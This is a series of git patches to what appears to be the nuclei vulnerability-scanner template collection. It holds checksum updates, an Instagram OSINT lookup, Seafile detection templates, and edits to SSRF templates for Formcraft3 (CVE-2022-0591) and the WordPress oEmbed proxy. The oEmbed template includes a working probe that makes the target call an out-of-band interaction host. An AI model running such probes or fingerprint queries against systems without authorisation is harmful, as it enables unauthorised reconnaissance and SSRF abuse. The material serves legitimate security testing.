+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7036,7 +7037,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:160284022a9b3252f88ab93556e62cb136fa19ff +templates-checksum.txt:5ae43d86ea3706ef103c9423d3f950d8d692b124 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d0eb2c033b5e950cf7402a8a1a20a7ab5f21bd88 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 4 Sep 2023 18:01:19 +0530 Subject: [PATCH 0112/1090] Update instagram.yaml --- http/osint/instagram.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/http/osint/instagram.yaml b/http/osint/instagram.yaml index 862b56c096..fcde5aa26b 100644 --- a/http/osint/instagram.yaml +++ b/http/osint/instagram.yaml @@ -9,23 +9,27 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: osint,osint-social,instagram metadata: max-request: 1 + tags: osint,osint-social,instagram self-contained: true http: - method: GET path: - - "https://www.picuki.com/profile/{{user}}" + - "https://www.instagram.com/{{user}}" + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - - "Instagram profile with posts and stories" + - '{"username":"{{user}}"}' + - 'Instagram photos and videos from' + condition: and + + - type: status + status: + - 200 From a12195db23b321847f9eb8ca9465acf7ea1b85f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andr=C3=A9=20Luna?= Date: Mon, 4 Sep 2023 11:27:04 -0300 Subject: [PATCH 0113/1090] Added symantec-phishing-readiness-platformn Template --- .../symantec/symantec-phishing-readiness-platform.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml b/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml index ce486eeff5..0d968a4e4c 100644 --- a/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml +++ b/http/exposed-panels/symantec/symantec-phishing-readiness-platform.yaml @@ -10,7 +10,6 @@ info: tags: symantec,panel,login metadata: max-request: 1 - shodan-query: http.title:"Symantec Phishing Readiness Platform" self-contained: true variables: From f42016fbd5d50ae556a30ae743f36301d73f9a2a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 4 Sep 2023 17:38:51 +0200 Subject: [PATCH 0114/1090] Add tpl --- http/exposures/apis/seafile-api.yaml | 41 ++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/exposures/apis/seafile-api.yaml diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml new file mode 100644 index 0000000000..0d6313347e --- /dev/null +++ b/http/exposures/apis/seafile-api.yaml @@ -0,0 +1,41 @@ +id: seafile-api + +info: + name: Seafile API - Detect + author: righettod + severity: info + description: | + Seafile API was detected. + reference: + - https://download.seafile.com/published/web-api/home.md + - https://manual.seafile.com/ + - https://www.seafile.com/en/home/ + metadata: + max-request: 1 + verified: true + tags: exposure,api + +http: + - method: GET + path: + - '{{BaseURL}}/api2/server-info/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'seafile-basic' + - 'seafile-pro' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version":\s*"([0-9.]+)"' \ No newline at end of file From aa2f0d0bfb6743056d969c7c9001223264440921 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 4 Sep 2023 18:00:08 +0200 Subject: [PATCH 0115/1090] Tune tpl --- http/exposed-panels/seafile-panel.yaml | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index 6f6f9294da..191826f53f 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -2,12 +2,13 @@ id: seafile-panel info: name: Seafile Panel - Detect - author: TechbrunchFR + author: TechbrunchFR, righettod severity: info description: Seafile panel was detected. metadata: max-request: 1 shodan-query: http.favicon.hash:1552322396 + shodan-query: http.html:"seafile" reference: - https://www.seafile.com/en/home/ - https://github.com/haiwen/seafile @@ -27,3 +28,19 @@ http: - type: dsl dsl: - "status_code==200 && (\"1552322396\" == mmh3(base64_py(body)))" + + - method: GET + path: + - "{{BaseURL}}/accounts/login/" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SEAFILE_GLOBAL' + - 'seafile-ui.css' + condition: and + + - type: status + status: + - 200 From 7a5b8e51c5598696b69c0576dc5093dcc885814d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 4 Sep 2023 18:07:17 +0200 Subject: [PATCH 0116/1090] Fix linter error --- http/exposed-panels/seafile-panel.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index 191826f53f..9f21760216 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -8,7 +8,6 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1552322396 - shodan-query: http.html:"seafile" reference: - https://www.seafile.com/en/home/ - https://github.com/haiwen/seafile @@ -28,7 +27,7 @@ http: - type: dsl dsl: - "status_code==200 && (\"1552322396\" == mmh3(base64_py(body)))" - + - method: GET path: - "{{BaseURL}}/accounts/login/" @@ -43,4 +42,4 @@ http: - type: status status: - - 200 + - 200 From af080df9118743a0794cf9ba2c3d9a7d857735c0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 16:40:58 +0000 Subject: [PATCH 0118/1090] Auto Generated Templates Checksum [Mon Sep 4 16:40:58 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2e39d65ad6..5777c8c9b5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4992,7 +4992,7 @@ http/osint/inaturalist.yaml:bbcf137228d20832ee8c2b53b19a3479155a87be http/osint/independent-academia.yaml:b2fd1c65cd4b823a1952658664d82a3a9159942e http/osint/inkbunny.yaml:05eb5740a44e5ca6fcfec9fe20f552ed7be6700c http/osint/insanejournal.yaml:0512759e86738f5f3ea7299e320ca88502d37ca7 -http/osint/instagram.yaml:8d18c4e9e671c9078224cd9334eda10c0fbf6b94 +http/osint/instagram.yaml:8c8cadd2be6855785dda879c8ec593818c7bb4ad http/osint/instructables.yaml:1f8aeb1664023e75872a7bb68406b44774704508 http/osint/internet-archive-account.yaml:158256956c1e1fbf15d73f69256056871a9599a4 http/osint/internet-archive-user-search.yaml:43c6d65acd4105ec8087d297bd209150ebf130fe @@ -7037,7 +7037,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:5ae43d86ea3706ef103c9423d3f950d8d692b124 +templates-checksum.txt:9b3f28bdcf634646fa5ee42bd3135ff21c5c9e44 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From a20bd30096bc26af70c1244f84f1a6cca1368114 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 4 Sep 2023 23:15:06 +0530 Subject: [PATCH 0119/1090] metadata update --- http/cves/2022/CVE-2022-0591.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index 9618c1296d..4495708082 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -4,7 +4,8 @@ info: name: Formcraft3 <3.8.28 - Server-Side Request Forgery author: Akincibor,j4vaovo severity: critical - description: Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. + description: | + Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. reference: - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 @@ -16,8 +17,9 @@ info: epss-score: 0.00694 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: - fofa-query: body="formcraft3" && body="wp-" max-request: 1 + verified: true + fofa-query: body="formcraft3" && body="wp-" framework: wordpress vendor: subtlewebinc product: formcraft3 From 93863aeb08ad66002d3cf64928cdcab0e1156925 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 4 Sep 2023 23:43:10 +0530 Subject: [PATCH 0120/1090] Update wordpress-ssrf-oembed.yaml --- .../wordpress/wordpress-ssrf-oembed.yaml | 32 +++++++++++-------- 1 file changed, 19 insertions(+), 13 deletions(-) diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index ac39f6ee4d..d62f4a5f56 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -1,29 +1,35 @@ id: wordpress-ssrf-oembed info: - name: Wordpress Oembed Proxy SSRF + name: Wordpress Oembed Proxy - Server-side request forgery author: dhiyaneshDk severity: medium reference: - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress - https://github.com/incogbyte/quickpress/blob/master/core/req.go - tags: wordpress,ssrf,oast,proxy metadata: - fofa-query: body="oembed" && body="wp-" max-request: 1 + fofa-query: body="oembed" && body="wp-" + tags: wordpress,ssrf,oast,oembed http: - - method: GET - path: - - "{{BaseURL}}/wp-json/oembed/1.0/proxy" - - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" + - raw: + - | + GET /wp-json/oembed/1.0/proxy HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(to_lower(response_1), "rest_missing_callback_param")' + - type: word + part: body_1 + words: + - 'rest_missing_callback_param' - - type: dsl - dsl: - - 'contains(interactsh_protocol, "http")' + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 9a3883f9d7cbca0c1db262bf7680cdd2103413a3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 18:13:55 +0000 Subject: [PATCH 0122/1090] Auto Generated Templates Checksum [Mon Sep 4 18:13:55 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5777c8c9b5..0c53a6f35e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2074,7 +2074,7 @@ http/cves/2022/CVE-2022-0441.yaml:fe86eae2838e0740f54d5fb7e109ed88424f1af4 http/cves/2022/CVE-2022-0482.yaml:37140b14e0e4967d70d3b57792d8a921064582fd http/cves/2022/CVE-2022-0535.yaml:9d198f8d5bb52cd0ac37edeaeb308562adaebfde http/cves/2022/CVE-2022-0540.yaml:34d9c99b9fb5a96c5dc113d2559d857996c4ee23 -http/cves/2022/CVE-2022-0591.yaml:6d574e04a9c982b2dd7a692e92001ad9cfc04db6 +http/cves/2022/CVE-2022-0591.yaml:cb99d16c32d2b21e7e7a1d0ab9e98ae0f0958d50 http/cves/2022/CVE-2022-0594.yaml:275f880ff9653b479029619f045cf441adcc8746 http/cves/2022/CVE-2022-0595.yaml:73265772d9c810ed637f4600f7c492771aeabbe7 http/cves/2022/CVE-2022-0599.yaml:65f73416beb10f3de6c02cef7fef1eb24ac7e200 @@ -7037,7 +7037,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:9b3f28bdcf634646fa5ee42bd3135ff21c5c9e44 +templates-checksum.txt:ded47d45601bcf357e2a596446703c5d65cd4653 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From b70d47af3b41006507b74b71bafbaa1a35eb8d9b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 18:20:46 +0000 Subject: [PATCH 0124/1090] Auto Generated Templates Checksum [Mon Sep 4 18:20:46 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0c53a6f35e..f1c77a8174 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6807,7 +6807,7 @@ http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml:6fd8e08ca4b3af4 http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml:160c8e016dfa7a4351957053c48c49164fd086a6 http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml:7abfe49b07546c0b23c0076826ec6e16928af900 http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml:e947f04741086e7de80038709ae5f043a8440ecb -http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml:205e8cf7624d0a60cd34dbbe4af8ca6d1779dffe +http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml:8da516b1230809622723cfcf26506c1be3a8adf4 http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml:eab30e14ab1e1f73cb16a5a87fa3faa8eb686d48 http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml:76df72e230808ceda3fd00315c12df12ffe1b6f4 http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml:b1572bedd080878a2f919d31b489e19bf8806c04 @@ -7037,7 +7037,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:ded47d45601bcf357e2a596446703c5d65cd4653 +templates-checksum.txt:388a1a7d6051b2bf2d283447dbc02ed6493d12ec wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 141a75f25dabf528d783b0cc0af5905b872a8581 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 18:22:21 +0000 Subject: [PATCH 0125/1090] TemplateMan Update [Mon Sep 4 18:22:21 UTC 2023] :robot: --- http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index d62f4a5f56..60e601b914 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -8,8 +8,8 @@ info: - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress - https://github.com/incogbyte/quickpress/blob/master/core/req.go metadata: - max-request: 1 fofa-query: body="oembed" && body="wp-" + max-request: 2 tags: wordpress,ssrf,oast,oembed http: From 140c4ac5d3161d4cc9d2cf9127f03c78b306554c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 04:02:16 +0000 Subject: [PATCH 0126/1090] Auto WordPress Plugins Update [Tue Sep 5 04:02:16 UTC 2023] :robot: --- .../plugins/click-to-chat-for-whatsapp.txt | 2 +- .../plugins/limit-login-attempts-reloaded.txt | 2 +- .../plugins/pinterest-for-woocommerce.txt | 1 + .../plugins/shortpixel-image-optimiser.txt | 2 +- .../plugins/translatepress-multilingual.txt | 2 +- helpers/wordpress/plugins/updraftplus.txt | 2 +- ...woocommerce-pdf-invoices-packing-slips.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-404-redirect-to-homepage.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/astra-widgets.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../wordpress/plugins/easy-fancybox.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - .../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/iwp-client.yaml | 1 - .../wordpress/plugins/jetpack-boost.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/loginpress.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../plugins/pinterest-for-woocommerce.yaml | 49 +++++++++++++++++++ .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-builder.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../wordpress/plugins/svg-support.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../plugins/themeisle-companion.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - 